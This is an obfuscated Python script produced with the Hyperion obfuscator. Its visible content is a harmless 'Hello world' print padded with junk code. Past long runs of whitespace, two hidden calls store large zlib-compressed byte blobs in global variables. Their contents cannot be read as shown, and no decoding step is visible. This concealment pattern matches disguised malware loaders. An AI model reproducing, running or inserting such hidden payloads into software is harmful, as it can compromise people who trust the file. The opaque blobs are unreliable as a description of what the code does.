from builtins import *
from math import prod as _round


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


CallFunction, _stackoverflow, Modulo, Frame, _multiply, _absolute, Power = exec, str, tuple, map, ord, globals, type

class _square:
    def __init__(self, _system):
        self._run = _round((_system, -53380))
        self._invert(Builtins=-52459)

    def _invert(self, Builtins = None):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._run += -14884 / Builtins
        
        try:
            ((_multiply, {Modulo: _stackoverflow}) for _multiply in (Frame, CallFunction) if _stackoverflow >= Frame)

        except AttributeError:
            ((Frame, {CallFunction: Modulo}) for Frame in (_stackoverflow, _stackoverflow, Modulo) if Negative is Negative)

        except:
            Power(84704 * 426) == bool

    def _cube(self, While = 71934):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        While -= -92309 + -16910
        self.Math != str
        
        try:
            (_stackoverflow, _multiply) if Modulo is Modulo else {CallFunction: Modulo} == Negative

        except AssertionError:
            (((CallFunction, _stackoverflow, Negative), CallFunction) for CallFunction in (_stackoverflow, _multiply))

        except:
            Power(-32896 - -6424) == float

    def _detectvar(Positive = type):
        return _absolute()[Positive]

    def Cube(_statistics = 97272 * -24812, Statistics = True, Divide = _absolute):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Divide()[_statistics] = Statistics
        
        try:
            {CallFunction: Modulo} if Negative == Modulo else (_stackoverflow, _multiply) < Frame

        except OSError:
            (((CallFunction, _stackoverflow, Negative), _multiply) for _multiply in (CallFunction, _stackoverflow, Negative))

        except:
            Power(225 * -39870) == str

    def execute(code = str):
        return CallFunction(_stackoverflow(Modulo(Frame(_multiply, code))))

    @property
    def Math(self):
        self.Absolute = '<__main__.Negative object at 0x000006212BE71516>'
        return (self.Absolute, _square.Math)

if __name__ == '__main__':
    try:
        _square.execute(code = __code__)
        Invert = _square(_system = 70130 + -18556)

        if 170832 > 5245960:
            Invert._cube(While = -80321 + Invert._run)
        elif 262668 < 2333266:
            _square(_system = 96992 + 74275)._invert(Builtins = Invert._run - -93875)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='OOoOo0OoO0OOO00OOO',Statistics=b'x\x9c\xe5\xbdis\xdb\xc8\xd6&\xf8\xdd\xbf\xc2o}\x91t\xcb\xf6\x05\xb1C\x11\xfa\xd2\xe1\x99h*$\xab\xa351r\x87^\x87\x82\x9b\xaa\xa8\xa2H\xb7$_\xab\xba\xa3\xe7\xb7O\x9e-\xf3\x00\xe0\x02\x12H\x8au\x8b\x12I0\x99\xc4\x92\xc8\xe5,\xcfy\xce\xcb\xd3\x9f\xa7\xef\xde\x9b\xc7\xf4\xfe\x18\xdf\xe1qw\xb7\x18\xde\xffx\x1e\r^\x16Oww\xef\xff\xe3\xec\x97\xff\xfa\xe7\xf7\xc9\xd3t1\xff\xe5\xfd\xe2IU\x1b\xfcx\xf9}\xf1\xf4\x8cu\x8e\x7f\x19Ng\xb3?_~\x9f\xfc\xb6\x18\xbcDI\xfa\xcb\x87_\xfe\xcb\xec\xc7\xe4\xbfO\xc6\xbf\x9c\x94~\xf5\xdb\xf4\xe5\xf7\x1fC\xda\xf1\xef//\xdf\x9fO\xff\xf9O*\xfb4Z<\xfe\xb3\xb2\x9b\x7f\xae8\xf6x\xfa<Z<\x8d\xcb\xbb\xe1\xc2O\xbf\xfd\xf6\xcf\xef\xb3\xc1o?&\x95\x1f\xcd\xa6\xa3\xc9\xfcyB?\xfa\xbf\xfe\xdb\xc5\xc7\xf0SP\xa92Z\x8c\xe9\xfb\xa3\xefO\xd3\xf9\xcb\xf1/\xffu2\x9b-\xde\xff\\<\xcd\xc6\xff\xf1\xcb\xc9\xd1\xbb\x93S[\x1b\xbe?z\xfec:>:y7y\x1dM\xbe\xbfpc\xce\xbf\xff0\xbf\xfc\xef\x8b\xe7\xc9\xf3\xfb\xc1\xd3\xe4\xfd\xd3d\xfc\x9f\xf3\xffw\xba\x98M^\xa8`hZ\xe6?\xe7\xffc\xf1\x03?\r\xde\xc3N\xfes\xfee1\\\x8c\xff|?\x9b\xfea~\xf7\xe7\xe2\xc7/\'\xef\xe8\xa4\xa6\x8f\xdf\x17O/ww\xe6h\x7f>\x1f\x9d|\x9a\xbcN_\x8eO\xde\xcd\x16\xa3\xc1\xec\xf9\xf8\xe4\xf6\xa8?\xeb\xcf\xf0\xd1\xe7\x97\xfe\xd1\xb7\xb3\xdff\x8b\xa1\xf9\xfe]\xfdK\xf8\xc9\xa3y\xcc\xe7\xf3G\xf37\xc7\xed\xc7\xc7\xa3\xdb\xd3\xd3_?\xfe\xfa\xf1\xf8\xe3\xf1\xaf\xbd\x93\x93o\xdf\xce\xc6\xd3\xa7\x15?\x9f\xcd\xcc}zx\x98N\xa73\xf3\xf20{0\x9f\x1f\xea;\xf8m\xf22xyY\xb5\x93\xeb\xf0\x1a\x1e!\xfc\x87\xf0\x80W(1gO\x17\xf7ne\x15\xbc\x06>\x7f|\x85+\x98\xc3\xe3\xd1\xfc\xda\xb5\xd9\xcaC\x87\xb4_\xd9\xbf=\xf0\x8a\x9d\x1e\x1f\r\x7fLg/\xd39\xdc\x80\x7f\r\x9eV\xb5\xeb\xe5\x97Kx|\x81\x07\xbc^\x9a]b\xe3P;\x99\x06{x\xc0\xc6;^y\xa0\xe9t\xf4<\x98O\x87\xd5\xe6<\xf9\x80\xb7\xe9\xd1\xfd\xd0<v\xd8\xcd\xc9mG\xfb\xf94\x9d\x8f\'\xaf\xc7G\x7f\xdeOg\xaf\x93\xdf\xe7?jU\xbe\x9d\xac\xbf\x83W\xc1\xc2\xfc\x05\x0b\xf30\x9bW\x8b\x05ln\xdfb\xcf\xf3\xe9\xcbl\xfa\xa3m\x8b\xad\xdc\xcd\x96-\xb6z?\xd2b/\x83\xc5\xec~yk-\xed\x97<\xc8\xfb}\xdb\xd9\xe0\xb5\x8fE\xa6\xb9\x8e\x8e>=,\xa6\xf3u\xbf6\r\t\rj^M\xcb\x9a\x07\x8e_\xd3\xac\xd3\xbfAk\xcf\x16\x8b\xfa\xb7\x9b\xba&\x1d\x89\xa6\xc6\xf9\xdc\x9d\xca\xdf\xa1\xbd\x06\xff\x9al\xd99onn\xbe~5\xcf\x1bz\xd2\x87\xbfASM\x9eg\x83\xff{\xcb\xb6\x9a\xdb\x1e5\x7f\xb4G|\xfc{t\xad\xa7\x97\xe7-[\xebj\x11\\\xc1\xaap\x85\x8b\xc4\xd5U\x10\\]\xfd\r\x1aj2\x9b~\x7f\\\x8c\x965\xd6\n\x89\x86\xdb\x0e\xdfp\x1e\xa3y\xed\xfa\xef\xd0X?\x9e\xfe\x9f\xe6-\xf5\xfa\xf3\'\xfc\x9b\xc7O|\xfe\xa4\xc7\xab\xde\xc3\xaa\xd9\xff\xf8\xe8\xa4g*\x04\x9d\xd7\xad\xc9\x8d\xc7\xc3\xa3(N\xee\xa3\xd0<S\xf3L\xcc33\xcf\x9ey\x16\\\x06\x9f\xf3p\x18\xe6\xe1\xb8Q\xdd,,\x8c\xf4:\x9e\x80\x96s|\x94\xdf\xbf\xd4%\xb6\x13z\xc1\xe7\xbf\x7f\xc7\x19M^\xb7\\\xe9\x96\xdd\xa7tl\xff&\xf6U\xb6\xdc\xbb\xfc\x8d7\xdd\x83og[u\x930\x8bzQ\x11EQ\x18\xc5\xe1$\xce\x93"\t\xa2A\x1a\xa5\xf7\xe6\xc0If:F\x16\xa4\xc34\x0b\'Qh\x9e=\xf3\x0c\xecv\xb6\xb1C\xac\x9b\x9c\x1f\xf94\xe9\\eU\xdb\xbd\xc3\xf7\xc21v\xe6\xa0YG\xdd\xb2\xa1p\x1c\xa4<N\x02~\x8fy\xbc\xc88\x89y<5\xa9\x1b58\xcdm\xfb\xd2D\xf5\x1a\xd7\xab&\x95\x1e\x86[\x9d\xf7\xa3\xcc\\U:J\xd3v\xbdb\xd9\xbe\xe3\x01\xfe\x8d\xe2\xc2<\x07\xf8Z\xf0\xfb\x00\xdf\x0b\xfc<\xea\xfc\x92\xe2(\xee%a\x9c\xb4\xec\xe8\xb0T\xc0\xb2A\x8b\x86\xf9\xdf\xbd\x8f\x07\xdc\xc7{M\xfb\xf8l\xf08\x1c\x0f\xde\x93\xf6\xd7\xef\xa3\xe6G\xca\xdf\xe9\xb2\x05n\xdde\x98s1\xe7q\x89o\x97tVf{\x8f\xd7\xb2\xe5\xdd\xc3I\xec\xdeL^E\xda\xf6\x0e\xce\xf8\xd1\'\xb5\x19\x1b\x126w\xbf\xf8\x84g\x06\x99%zj\xd5\x8dd\xd5\xe5\xd9\xa4I\xdd\xd4S#fqZ\x98\xe7(M\xa2I\xcbF\xbc0\x8f\xf3~\xdf\xfc\xf7/\xcc+l\x9b\xad\x86\xc2Pp\x97\xdf%w\xbd\xbb\xe0\xae\xb8\x8b\xef"\xf3\x17\xc2A\xeb\xa5\xbb\xdf\x92\x1c\x04"\x9e\xa83\x9e\xa8s\xdeN\xb9\\\x04\xa6&u\xb7\x10\x98\xb6\xef\xdb\xb1\xe9\xd9\xe6\xde\x9b\xbe\x1d{\x98p\'\xf1\x18\x9f\xf2:V\x9f\'\xaa\x14?\xb5\x98v\x8fN\x12\xbc\x7f\xb9\xb9s\xb9\xf9\xcb\xcc]\x8c\xcd\xef\xd2zi\xfb\xfb*\x8b\xb1<3\x1e>\xf8]\xe5\xbe\xae\xab\xdbp\xbe\xda\xb6\xd1\x93<\xc9\xec\x13^\xf5{\xf9\x99w\xbe\xd2\xa5Y\x16\xa6\xf7\xe6xA\xdbA\x0ec\x1b\xc6\xb9\x19\xe0\xe6\xed\xa2\x0fo\xfdC\x15\xea\xcc\x12?\x8a\xef\x93\xb4\xf5\x12\x1f\x80\xa5aqu\x15\\\xc1\x16<\xcd\xe7\xa6z\xde]z\x17\x9a\'L`\x05v\xf7\xc8\xfc \xac\x97\xee\xad\x15wk\xc9(\xbe\xc7I!\x89\'I\xcbI\xe9h\xfe\xc8\xd6-:\x859\xa9mM\xd7\nS\xa1\xd7\xb0nb\x1a\x17\x9a\xb9w\x07[\x81i\xe6\x1e\xce?\xb5\xd2v\x8ax\xc1kBO\xad\x19\x89*K\x95"\xbe\xa9n\xb2\xad"\xfevr\x13Ys\xf1A\xa6]\xb0\xed\x9a\x0f\x8do\x0e\x8c\x81\x18\x9f0\x12\x8a\xbb\x02oN\xadt\xf7\x9b\x13r\x83\x07<\xc1GJ\xb6\xca\xf9\xbb\x84oN\x93\xba\xf1V#l\xf1r\xbc\xd2\xb7r<\xb7\x17P1\xf5\x1e/5\x98\x9fl\x1aQ\xf2s\xde#j\xdc\xfb\xd7Df$:\xf7E#\xe9\x8bT}\xba\xc6\xa3\xb2\x8bMe\xa2\xb4\xe1\xb2\x06\xec4\xe2\x89\x07=8\xeaE-u\xe0#k\x81\xe5\xaf\xc2\xeb\xc3\xd5\xb2\xc20\x8e\xd2\x1c\xa4\x07\xd3\x9eE\x96\xa4\xe30\x8c\x86f\x12\x81\xf7^\x14\x98\xc6\x08\xc3Q\x18\x98z\x19\xce+\x19(\x13a\xa0~\x95\xac\xfc\xc5\xc4\xc8$q4\x8c{\xd1\xd8\xac(a\xda3w,V\xb5\x8b\xa80u\xdb5\xb6\x18s\xad\x82\x0e\xaf?\x7f\xb6\x9bR\xac\n\xa7\xb6Ced-\xd4\x94\xb2\xa9n\xeeK?\x9e\x98\xf64\xad\x0f-\x99\x0e\xd2^60w#\xc9\xa2\xcc\xb4p\x18d\xa9\xf9vd\xee\'~\xefA\xc70\xf3h\x14\xc4\xa6G\xc0{\x8a\xef\xe9\xbd\x11!\xf0\x1d\xbe\x89\xf9\x1b\xf9\xb6{\xa17MM\x1b\xa7q\x16gQ\x9a\xb5\xd7nA\xe4E\xa5\xd6H\xc0\xb0m\xde\x0fV\xf0\r\xcd*o\xc6\xa1\xb9\xeb\xe6\xe6v~oc\xb8\x93\xe6\x19\xf3\x13\xc6\xbd\xd9\x82\x07\xbe\x9bO>\xe6\xdd\x00&\x0f\xf3\x17E\xb9\x99\x1a\x92\xd6\x16\xea\x9f\xca\xcd\xf3J\xcf\xceE\xd0\x95\xd6\xa1\xb82\r\xf4\xe4]Y\x85V\xd5\xf1)\xe7\xe3\xe4l\x9a\x1b\xd5E\xe8F0}\x0fL\x87\x1a\x9b\x9b\x1c\x1a\xa1\xd1t+3\xaa\xacBi\xb6ab)\xd2\t\xfdR\x7fc\xf6\x92C\x17\x84_\x98Q\x08\x13|\x84\x82\xe7$\xcd\xd0\xf3\xd0\xc3\xb2q\x16\xc11\xd2I\x06\x16\xe6Q6\xce\xc6m\x05\xd3\xaf$\x8e\xde\x90`\xfa\xf5\xa6\x9dx/\xa2\xba\x98\x08\xc4\xce\x9fW\xeeY\x93\xba\xbe4]\xd3\x96\x1el\xf32\xb0iX\xc3\xbb\x0cy\x1c\xed8\xa1\xa7\xfc\xd7\xfd\x04\x8eV0\x909\xccL6\xc9:S:Y8\x86w\x0f*g`\xb4\x96\x00M[1j\xf7\xd9]\x8e\xa6\xccZi;\x93W\x948kqR\x99\x1f\x8a\x8a)sS\xdd\xad}\xbf[\xaeu<$\xe4p\xf6\xb0J\xf3\x15%\xacI\xdd&J\xd8\x96\xfd<\xcb\xb2\xdc\xfc\xd1+\xbcg\xfc)\xb3\xdfd\xa5o7v\xc5\xb5f\xd1\xa0\x9d\xef\xbf\xe0\xc6\xe8\xa9\xc6\xc9Ys\x15?\xa4\xccIM\xea6]O\xd6\xfaP\x08\x80H^\'\xab\xf5\xb5p\xa1l-!\xadV\xb5\x8f\xff\xbf\xe5*\xf5\xe2\xe9\xf8x%6\xe6d0\x1f\xef\xa4\x8a\x7fE\xa3\x08YF\xe4g7\x8d\x8d"\x05\xda\xc3{w\xa1\x99.b\xb3MF\x91\x00\'\x8eRi\xc3\xfd\xa5X;Ck;\x18S"\xdc_V/\xdd\x8f\xe8\x93\xaa\xee(\xaes\xed\xf4B\x8dI\xb9\xd97\xd5\r\xb7\x9b\xbav\x13\x89\xee\t0a\x04\x16\x10i\x8cX\x14\x82^kD\x17\xf3\xa9H\xa3\xf0>\xba\x87\xe57j+\xb6PY\xc8F\x01\xac\x02\xef\x8d\xef4\xdc\xcd\x00\xeffB\xfd\x05\xeft\xadto\xd6\x86\xddZ\xbb\xady\xe5\xfc\x1c\xd54tD\x82\'\xd2l\xec\x07\x92\xb5\x0f3|k{\x08\xd9?\xc8\x10\xf2\x13\xd1n\xfbi\x9c}t\x9d\xeeL\xdbK\xd5^\xed\x18-;I\'\x9d8K\x03\x1c\xa2=\xf3\x17\xa1["\xe4\xa9\xbf\xa8\x96n!\x89\x92\x9b5\xe4=\xc4,\x89VJ\xf7zW\xb7\xb7$\x91\xad\x88\x9eb;BE\xc4n\x8b"\x02&\x82V\xb7 3\x8d\x92\xa3\xeb\x01\xe6Kp?\x00\x0e!\xaf\x97\xfaP\x1c\xbc\xd4\xed\xec\xb65\xb8}G\xb2~\x89\x1ce\x17\xb2v\x02\x83\xe80\x85\xd2\xaf\xe5\x99U\x04\x86Mu\x1b\n\x0c\xdb#i\xf2\xac5\x0c\xa9\xcfP-\t\xe5\xa1\xad\xf6m\'p\x071C\x8b}"U\x8aW\x93\xba\r\xbd_\xdb\xcf\xdb~a.\xf5\xe7d\t\xe0\xa5\xdd\xec\xbdO\xa3L\x05\xbfS\xde\x9a\xc8\x82\xd4\xf5\xc5\xa0#h\xd2\x1b\x0e\x06\xbd\xac\x08\x03\xb4\xfa\x81#a\x98\x8d\xc3 \xccM\xd9}:\t\xcd7`-l\t2\xb1\x10\x93>"L\xfa\x17\xe7\xe7-l\xedb\x96\x13oL\xa2\xbaz"\xe6\x91\x8a')

        if 192937 > 7049161:
            _square(_system = -7684 + -47426)._invert(Builtins = Invert._run * 56022)
        elif 107869 < 1119016:
            Invert._cube(While = 30474 + Invert._run)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='ODDoDDoDODoODDOoDDDODO',Statistics=b'\to]]o\x88\xc6\xd8\xf4\x17\xf3l9\x8d\xe0.\xf9\x9f\x8e\xd2\x06\xc6)\xf0\xb7P\xd9\r\xa4q\xa4\x81\xa4\xf1\x9a\xd4\xf5\xd4x\x95\xde\x19s\xef4\xa5\xe3,6\xef\x13\xf3\xdd\xb0(R\xf8.\xce\x12\xb0@\x87A\x12\xc1/\x86\xa6\xff\x8e\xe2"\x18\xa5\xc3\x00j\r"\xa3\xd2\x05\xf1\x08>g\xe0\xca\x1c\xd1~\xe1\xb7I\x8cNM\xfcu\x9c\x925\xdc\x83\x83\xe5>f\xe7\n?\xec\x16\xdbc\xe9\xc9\xb6\xd9\xeeq\xd1\xbd\x18\x96\xb3^\x92\'\x83(N\xc38I\xe3\xc84Z\x0c\xc6\xfdA\x14\xa6\xc3\xc8l\xc7\xf0l\xab\xf1\xf2\x81\tsL\'\xb2{W\x15\x93\xbb,\xfd\x85\x1a\xb3\x05?\x03\xee\xaa\x9b\xea\xe2w\x9e\xc6yr\x0f\xae\x91,\x00G\x88\xd9j\xab\xd1A\xac\xfd\x83\x11\x17\xa6\x0f\x0f`\xfd\x9aN1\xf4\xbe\xb1\x8eP \xc86C#Ah^{\xa8#\xd4J\xb7\x02\xf2\x92\x9e\x02\x96\xee\xc2\xc2xUY\xc3}e\x08\x0f\x05\x1d%Em%\xbbKP\x18\xaf\x95\xb6\x93\x90d\x96\n\x12\xe5a\x93\xae\xa1\xa4\xa3u\xf5\xb6P\xf9w\xd6n\xb3\x84\x8dO\xe3\xb4\x97f\x9d\xb8Dfl\xb3\x9dq\xec\x00l\xfe\r-\xb6\x02\xfd\x97\x88\x89\x19C\x97\xda\xf5\xab\x88\xa5g\r4\xb6}F\xf5\xabu\xf5\xbc\x81C\xc6\xed1\x11KQ\xce\x16\xc3\xac0\xce\x99F7w\xbeZ\x99Ey\xd4~\x0ee\xc4Z_\x14\xaf\xd9\xbf\x93\xd10\x1b\x86\xe0\xb9\x9fdF\x9e\x01\xf8O4\xc0\x12#l\xa2W\xbe0:J\x02\x91  \xd9P\xd0\x81Y\x96\x8c\x10D\x9e\xff$@\x99\x87\xa5\x9d\xd8\xc5\x0e\xc2/\xc6\x18\x15\x06\x1e\xfd$6\xef\x00/J\xa0fb\xa6+\xf8\xd5\xbd9\xde\x04\x10\x00\xe0\xfb7\xdb#\x17{\x18\xc2\xf9\xa8=\x9b\xcf\x95=\x86\x93\x94\xf7\x19\x8e2\xa8e\xa6]\xfc\xfd\x08\xcf0\x02a\xd9tb\xf3-\xa0\xf2\xcc_\x01\xa2[\x14\x9bOY\x14\x98\xf7\xc44\xeb\xc8\xbcg\xe6\x9b02#\rk\x16\x88$I\xf0/4\xdf\xd1\xef\xcc\x85\x99\xe16b\x14C\x8a\xed\x02r"\x1c\xc9\x9c\x7f\xd6\x03\xb0\x14\x1e3A\x04\x84i%\xc2-$\xc3\xd6FY\x04\x96_A ;`\xcc!\x94\x1d\xf8N\x9a!\xcc=\xc3\x8bZ;+\xc5\xe1,\xca\x81`\xa0\xe5\x89\xf0Z\x05z\xd9T\xb7\xa9\xb3z\xad\x8b\xee\xabs\xd1Y\x07]\x0b\x90\x88(<UMQ\x8b\x0c\xb9\xc2\x04n\xaa\xdb\xf0\x1a\xb7W\x92PE\x1a\xde\x93J\x94\xe6i\x01\nOn\x96\x033\x8b\xa6\xa8\xfc v3\x1e\x1b\xe1>\x08{\xdd\xab6%\xecn=*\xda\xc6Dw\xbeL\xa0\xd0-\x12T\xf7\xeb\x9e\x8b\xe7\xc9J+_%\xb2\xc7\xd5\xe9>@w\xf9$\x1f\xe1d\x8a\xc2b\x02>\xcc$#+\x83\x9a\xeci\x9a7s\x06M}8Q\x9b\x89;\xd4\xdf\xb6\x8e\xb0\x9c\x92\xa87\x03]\x05\xc9\x02\x1e\x1a\xae\xaf\xf1]\xc0ab\xe4\x18/\xd0\x8b\x91\xd4K\xdb\xe1it\xec\xb6\xbc\xe7\xfa\xb3\xc2\xd3l\xaa\xbbE\x08\xc7\xf68\xc8\x8cW\xb7"\xca\xcdVh\xb6"\xf39\xc4(\xff\xc2l\xc5\xe6\xbde\x98\xd7\xda\x81\xab\xc0\xf5\xaa\xc4\x07u\x81\x1f\xb30\x0e\xc3e\xc32\xab\xbdg^\x06*\xa2 a\x1e\n\xcc0\x1d\x9b\xe1\t\xb0w#.\x91V\xd7\xd6\xa0\xc2\x16?|\x93\x90n\xf3lg\x00\x14+\xa8\x18\xf2z\x89Ca\xa0\x83@\x19\x007\xd5\xf5\xe3\x80\xb1\x9a\x94\x18r\xb4!W\x0e\x1fU\xb4\xae\xf5u;\x07\x99\xd5\x9c\x0eU\xeb}\xf7\xab\x9e\x82\x81w\x12"\xcff\x02G,\xd0N.\x0c\x12GH#H\x1fQ\x85u<v\x93\xba\x9ed\xa6N\xc3\x08\x96B\x0f\xcb\xe0B\xf9\xe4\x00\x88\xa6\xcc\x07\xb4\xb6\x03W\xc3\xd2N>\xb2,\x1e#\xcb\xe4\xe1\xd8<\x06\x96\xd3c\x84\x9c\x1fmX=\x0e\xdee\xbeY\x05\x11E\x84\xacU\x8dA\x82\x80\x13I\xd1\xa2\nvU\x84\x0c\x9a\x1f\xc4\xf5\xd2v\x16\xac\x1acE\xa2\xa2&\xd5\xf0lR\xd7#]\x82\xd7`\x97R\x8c~\xf55\xf7\'&\x84\x10\x97\xd5\x8e\x80\t\x8f\x86G\xc2C=\xee5\x1et[\xed%M\x8b\x96K\x14\xc4e]`X\x16\x12\x90\x00\xfc\xef\x1c\x1d\xc8\xed<Jz\xad\x89\x13\xc7\x0b"\xbc\x11\xa9\xf2(m\xaa\xdbP1\xd8V\xf6\t\xd5!\xe4p\xb2T\x8a\x89AG9o\xaa\xeb\x03`\x9fW`\xf4\xb2\xc2e\x95U\xaf{y\xbb5\xa0\xd4B\xdb\xedFc,w\x80.\xaa\x10av\x01b\xc9\x02\x04\xf2\xa9\xb2\x86\xfb\x02\x97\x17\x00\xfarD\x80Cx<8\xc3\x8azi;\x9cD\x908\xd7}\xaa\xb65>bU\x9d-\xd1d\x07\x1c\xd1z$\xf0\tf\xc2\xe2\xf3i\xa6E\xb5v\t\xd8!\xab\x96\xd4L\x95\xe9\xa1\xbc\xae\xdevd\x05-\xeeEYB\xee\xfa^X\x03\xedW\x16\x92\xe0c\xe7wb;a\x92\xe20\x809$\xc4\xbf\x00\x1d\xddQ\xbdtON\xa4\xa4\x8c^\xd0tb\x89(\xb6*\xc2jS\xdd\x1d\xdc\xd9\xbb\xac[b\xe2\xd7l\x1b\xa2\xceI\xf0G\xa8\xe2\x986\xd7m\xb5n\xa1\xf1\x84G\xfc\x176\x9d\\\xb61\x9dh\x1b\x83L\x92"&XJ1%>l\xaa\xeb\x8f\x05\xce\xe8\xb5\xe0\xeb\x1az\xb0\x1b\x1a\x1d\x10\xa2z\xe5\x15\xde\xe5)\xafR\xee\x85\xb42\x03\x15>\x01k\xb6\xb8\x17\xc9q\x08\xf1<Y\xe4\xc5P:QfQ\xbd]e\xed\xf4`4m\xaf6\x88\'\xdc\x01!ZaB\x12g^\x13Sy\xa8\x86p\xa8\x86x\x93\xba\xde\xb0\x97~ \xc8\xcc{A\x91\x0b1s]H\xa4\x02\xfdI\x8d\xc3\x04F\xf0D\xc8xR\x91\x85\x0e\x98\x164c\xf4\x01\x06\xeb\x016`\x9c\xe1\xcd5C>o\xab`r\\\xab\x8er=\x04\x17\xfd:"\x87\x12QCG\xde\xbc5f\xbf\x812\xf9\x8d,\x81\xef\x80\x8d}\x83\xee\xed\x98{\x13C\x97^\xb4\xbbH\xe1/.\xacusT\xb2|\xb2=\xb4\xfb\x15\x8e\x96n\x0f\xe1n\xb40#4\xa7\xc0\xbf\x91\xd1\xb9\xe8o\x84Ox\x95\xf2"\xed\xfe\xdeFm\xc7+C\x8a\xdd+<=(\x03\t\xab\xf9\x052\xd7\x81RO$\xa7\xb5\xd2v*\xa1x\xa8\xc4\xaa*\xa0\x11\x8b\x19Tj\xe1\xa6\xba\xbeI\x06Q\xf0\x8a0<\xda\xc1\x0cZ\xafD\xb8\x7f\xf6kn\x11\xd7\x00\x18\x82\xfc.ESI@\x11\x8f\xa8\xae%\xf5\xd2\xbd\xfa\x07vuE\xf5\x00:.\xa84\xf3Ya\xd5\xcclg\xbe\x91Y\xd1\x83\xb3*S\xee\xa9\xbc\xc4\x91\x91\x95\x8cz\\\xa7e0&\xf2\xa4 \xd2\xa3G\xc1\xeb\x1f!\xa0\xbdV\xda\xce\xb9\x1d&\xce[!\xcc\xfe:d\xa0P\xce\xedMu\x1b\xe2u7\xd1\x03\xe2\x87\x90\x83\'\x91*\xb1)\t\x80\x9f\x0c$o\x11\xfd\xbd;B\xa6{\xa60\xb1\x04\x8a\x14|)\x06\x82\xf6\xc1*\x02\xfb\x13N\x1eM\x0f[\rVYU\x97\x10\xe5~\xc4\xc8\xe8\xde\x07\x9a\xa84S\x08\xefNyf\xf1\xe1\xf6n\xdd\x11\xaee`B\x19\r\xd4v.\xd6\x9e\x9aD\xb4EN\x16l\x1d\x80\xb2\xa9\xae\xa7\xcc(\xdb(*\xbb\xd1.\x95\x97\x92U]\x02K\xbb\xd7\x92IMj\x0e\x93L\x8d"1f\x8e\xbc\x08\xf4\x0bb\xc8\x8b\xc2\xb6\xacuK5\x0c\xca~R\xb1\x9d\xd1v\xd9\x82\x06\x7f>\x1a\xa7\xa5\xed\xfe\xab\xe0\x1c\xc8\x80\xffu\x0b&\xa4\xf0\x8e\xbc[\x05.\xf3\x14\x98\x16U\xcb\x0e6HcW\xe3E\x0f\x85\xb9^\x1aB\xc7\xf2a\x9f,\xe1\x1e\x1d\xe2QA\x1c\xba\xd7\xd2Kr+\x8f\x9a\x11\x19eq\xe4\xf5@W\xf0\xa0\xc2\x92\xb2\nJ\xea\x00\x95T\xa7\xb2\x16\xa4\xb4\xa6\x1b\xef\xe7A\x81Q\x9c\xb9\\\x9ez\x1a\xd0\xc6\xf4\x83[:7@q\xf3\x12,WG\x90u\xde\x1d\xc34\xc7\xc0\xa7 \x8b\xcc\x84~\x0f\\^\xe1$M\x11\x96\x9b\xa4!Q\x08\x99\x12\x0cT2\xdf\xb73\xa7\x93\xbb\x92\xc2\x11i*\x84\xb7\xc6\x00\x82\x8c)g\x12D\xba\xe7\xe8\xf4\x07\xcd\xa7R\xdaxJ\xeda4o\x846\t\xd4\x9fpR\xad\x95\x1e\xfeT\t\xf1\x1c\xe6\x96\xf5\xfc\x18\xeeqn\x18\xb1\xc9\xab\xe0\xd9B\xcf\x1f#\x9eY\x06b$k\x8dcl\xac\x89\xe1\x02\x18bd6\xdc\xfd\xe0.\xfd\x08\xf9Dj\xa5\x8d\xb1\x84\x01\xf7\xa3\xe4\x8e\xed$\x88%\xac\x95\xfe[i\x95\xbb1Q\t\xe7\x94c3\xd7\xdb\xa9e\xa9\xf2\xc1f\x0e\xbdl\x08"\x01\xfa7\x80\x9b\xb9m\xac\xc0#\x1cT\x9f\x82y\xdd\x12\xff@`S\x98\x88"\x85\x7fP\xa5\xfb\x01\xe7\n\xfaE\x13\x8f\xa4Z\x8bJ\x1c\xf8\xbfI\xdd-Y%\xd7\x8e\xed\xdc\xfc\xa6{\xba\xb0\x95\xcd $\x99\x92n@\xde\x13eOXW/nnK\xd8h\xc9:G\xf6E\xa4\xef\xb9\xa0?H\x17\xd5\xb4-0\xffK\x84\xa0\xb6\x82\xb6\xe1\xe0\xf5\xd2\x7f/\x15\x00\x99h\xe2<B\x8e\x19\x1f\xfa\xa4C\xdf\x8b\xd7\xaa`\xcf\x95\xf3[I\xd6\xcdv\x82$\xc8/\x05*l\x19"\xd2c\xb6\xe0.)m\xdc\'\n\\\x93B\x8c\xfc\x0b\x99Y\xbbR\xd6\xd8k\x93\xa1o&\xc5s\x01>\xc4\x04\xbd6\xb5\xd2v\x80J\xc1\'I\xdc\xa0N-\x98\xabi\xa9I\xddm\xc9nw\xca\xd9!k\x99f]\x94\\\x1e\xf4\x8d\x17\x98N\x1a\x85c#r\x9b\xa6\x80H8\x0f=?v\x1cJ\xb1c\xb1W\x89,\x98\xcf\x9e\xdf;\xd7:Z\xea\x11\x90m{\x8a\\)\x0f\xb3\x192\xfd\x98\xe7t\x0b="\xba#I/\xa4\xe5\x99\xf5\x88J\xe9^\xe7G\x9b4\xea\x02\xf8\xdd\xce!\x9b`\x9f\x92\x88\x9a\xadm\xf3\xd7\xaera\x97U\xe6\xb2\r\xad{\x8bYk\xf8\xd5\x1aD\xd9\xf2\x8c\xe1\x16]\xd6\xf9\xa5d\x85\x0f\x03FyuQ\xe0\x90\x91]\x878\x13\xb4/\x02\xc3a\x0e\xe4"yh\xf4\x7fd<\x18\x9b\xe9&\xe0\xf4$H\xec\x96F\xa3h`\xca\xa0\x96\xd9\n!\xb5\x89\x17\xcbw\xd9y\xea\xac\xe0\xb6\xb4\xd5\xe2\x1b\x81\xc0\xf41k\x933WbwK<')

        Invert._invert(Builtins = Invert._run / -4384)                                                                                                                                                                                                                                                          